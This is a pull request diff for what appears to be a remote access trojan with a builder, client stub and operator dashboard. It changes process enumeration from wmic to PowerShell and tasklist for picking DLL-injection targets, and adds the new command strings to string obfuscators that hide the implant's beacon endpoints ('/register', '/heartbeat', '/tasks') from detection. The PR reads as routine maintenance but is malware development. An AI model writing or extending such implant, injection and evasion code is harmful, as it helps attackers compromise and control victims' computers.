### PR TITLE
fix(process): replace deprecated wmic with PowerShell/tasklist for pr…

### DIFF
--- a/builder/string_obfuscator.go
+++ b/builder/string_obfuscator.go
@@ -66,12 +66,13 @@ func (so *StringObfuscator) getCriticalStrings() []string {
 		"script_",
 
 		"cmd",
-		"/C",
-		"/register",
+		"/C", "/register",
 		"/heartbeat",
 		"/tasks",
 		"/result",
 		"wmic",
+		"powershell",
+		"tasklist",
 		"process",
 		"processid",
 

--- a/builder/template/obfuscator.go
+++ b/builder/template/obfuscator.go
@@ -66,13 +66,14 @@ func (ro *RealisticObfuscator) getCriticalStrings() []string {
 		"dr4ke_uploads",
 		"script_",
 
-		"cmd",
-		"/C",
+		"cmd", "/C",
 		"/register",
 		"/heartbeat",
 		"/tasks",
 		"/result",
 		"wmic",
+		"powershell",
+		"tasklist",
 		"process",
 		"processid",
 

--- a/builder/template/stub.go
+++ b/builder/template/stub.go
@@ -1289,8 +1289,48 @@ func (c *Client) listUploads() string {
 }
 
 func (c *Client) listProcesses() string {
-	cmd := exec.Command("wmic", "process", "get", "name,processid,parentprocessid", "/format:csv")
+	// Try PowerShell first (more reliable than wmic)
+	// Format output as simple CSV: Name,Id,ParentProcessId
+	psCommand := `Get-Process | ForEach-Object { 
+		$parent = if ($_.Parent) { $_.Parent.Id } else { "0" }
+		"$($_.Name),$($_.Id),$parent"
+	}`
+	cmd := exec.Command("powershell", "-Command", psCommand)
 	output, err := cmd.CombinedOutput()
+	if err == nil && len(strings.TrimSpace(string(output))) > 0 {
+		// Add header for consistent parsing
+		result := "Name,Id,ParentProcessId\n" + string(output)
+		return result
+	}
+
+	// Fallback to tasklist if PowerShell fails
+	cmd = exec.Command("tasklist", "/fo", "csv", "/nh")
+	output, err = cmd.CombinedOutput()
+	if err == nil && len(strings.TrimSpace(string(output))) > 0 {
+		// Parse tasklist output and convert to our format
+		lines := strings.Split(string(output), "\n")
+		var result strings.Builder
+		result.WriteString("Name,Id,ParentProcessId\n")
+
+		for _, line := range lines {
+			line = strings.TrimSpace(line)
+			if line == "" {
+				continue
+			}
+			// Parse CSV line from tasklist
+			parts := strings.Split(line, "\",\"")
+			if len(parts) >= 2 {
+				name := strings.Trim(parts[0], "\"")
+				pid := strings.Trim(parts[1], "\"")
+				result.WriteString(fmt.Sprintf("%s,%s,0\n", name, pid))
+			}
+		}
+		return result.String()
+	}
+
+	// Last resort: try wmic for older systems
+	cmd = exec.Command("wmic", "process", "get", "name,processid,parentprocessid", "/format:csv")
+	output, err = cmd.CombinedOutput()
 	if err != nil {
 		return fmt.Sprintf("Failed to list processes: %v", err)
 	}
@@ -1329,10 +1369,45 @@ func (c *Client) executeDllInject(targetProcess, dllPath string) string {
 }
 
 func (c *Client) findProcessByName(processName string) (uint32, error) {
-	cmd := exec.Command("wmic", "process", "where", fmt.Sprintf("name='%s'", processName), "get", "processid", "/value")
+	// Try PowerShell first (more reliable than wmic)
+	psCommand := fmt.Sprintf(`Get-Process -Name "%s" -ErrorAction SilentlyContinue | Select-Object -First 1 -ExpandProperty Id`,
+		strings.TrimSuffix(processName, ".exe"))
+	cmd := exec.Command("powershell", "-Command", psCommand)
 	output, err := cmd.CombinedOutput()
+	if err == nil {
+		outputStr := strings.TrimSpace(string(output))
+		if outputStr != "" {
+			if pid, err := strconv.ParseUint(outputStr, 10, 32); err == nil && pid > 0 {
+				return uint32(pid), nil
+			}
+		}
+	}
+
+	// Fallback to tasklist if PowerShell fails
+	cmd = exec.Command("tasklist", "/fi", fmt.Sprintf("imagename eq %s", processName), "/fo", "csv", "/nh")
+	output, err = cmd.CombinedOutput()
+	if err == nil {
+		lines := strings.Split(string(output), "\n")
+		for _, line := range lines {
+			line = strings.TrimSpace(line)
+			if strings.Contains(line, processName) {
+				// Parse CSV format: "name","pid","session","session#","mem usage"
+				parts := strings.Split(line, "\",\"")
+				if len(parts) >= 2 {
+					pidStr := strings.Trim(parts[1], "\"")
+					if pid, err := strconv.ParseUint(pidStr, 10, 32); err == nil && pid > 0 {
+						return uint32(pid), nil
+					}
+				}
+			}
+		}
+	}
+
+	// Last resort: try wmic for older systems
+	cmd = exec.Command("wmic", "process", "where", fmt.Sprintf("name='%s'", processName), "get", "processid", "/value")
+	output, err = cmd.CombinedOutput()
 	if err != nil {
-		return 0, err
+		return 0, fmt.Errorf("process not found: %v", err)
 	}
 
 	lines := strings.Split(string(output), "\n")

--- a/static/html/dashboard.html
+++ b/static/html/dashboard.html
@@ -2252,9 +2252,7 @@
                 console.log(`[TEST] Waiting ${retryDelay}ms before attempt ${attempt + 1}...`);
                 await new Promise(resolve => setTimeout(resolve, retryDelay));
             }
-        }
-
-        function parseAndDisplayProcesses(output) {
+        }        function parseAndDisplayProcesses(output) {
             console.log('[TEST] Parsing process output...');
             console.log('[TEST] Raw output:', output);
 
@@ -2264,9 +2262,11 @@
             let headerFound = false;
             let headerIndex = -1;
 
+            // Look for header line
             for (let i = 0; i < lines.length; i++) {
                 const line = lines[i].trim();
-                if (line.toLowerCase().includes('processid') ||
+                if (line.toLowerCase().includes('name,id,parentprocessid') ||
+                    line.toLowerCase().includes('processid') ||
                     line.toLowerCase().includes('pid') ||
                     line.toLowerCase().includes('name') ||
                     line.includes('Node,Name,ParentPid,Pid')) {
@@ -2284,7 +2284,24 @@
 
                 if (line.includes(',')) {
                     const parts = line.split(',');
-                    if (parts.length >= 4) {
+                    
+                    // Handle our new format: Name,Id,ParentProcessId
+                    if (parts.length >= 3) {
+                        const name = parts[0].trim().replace(/"/g, '');
+                        const pid = parts[1].trim().replace(/"/g, '');
+                        const parentPid = parts[2].trim().replace(/"/g, '');
+                        
+                        if (name && pid && pid !== '' && !isNaN(pid)) {
+                            processes.push({
+                                node: '',
+                                name: name,
+                                parentPid: parentPid || '0',
+                                pid: pid
+                            });
+                        }
+                    }
+                    // Handle legacy wmic format: Node,Name,ParentPid,Pid
+                    else if (parts.length >= 4) {
                         processes.push({
                             node: parts[0].trim(),
                             name: parts[1].trim(),
@@ -2293,12 +2310,13 @@
                         });
                     }
                 } else {
+                    // Handle space-separated format
                     const parts = line.split(/\s+/);
                     if (parts.length >= 2) {
                         processes.push({
                             node: '',
                             name: parts[0],
-                            parentPid: parts.length > 2 ? parts[2] : '',
+                            parentPid: parts.length > 2 ? parts[2] : '0',
                             pid: parts[1]
                         });
                     }


### PR DESCRIPTION
…ocess listing

- Replace wmic command with PowerShell as primary method for process enumeration
- Add tasklist as fallback when PowerShell is unavailable
- Keep wmic as last resort for legacy Windows systems
- Update frontend parser to handle new CSV format (Name,Id,ParentProcessId)
- Fix compatibility with Windows 11 and Windows 10 21H1+ where wmic was removed
- Enhance error handling and output validation
- Update string obfuscators to include new command strings

Resolves process injection 'refresh process list' error on modern Windows systems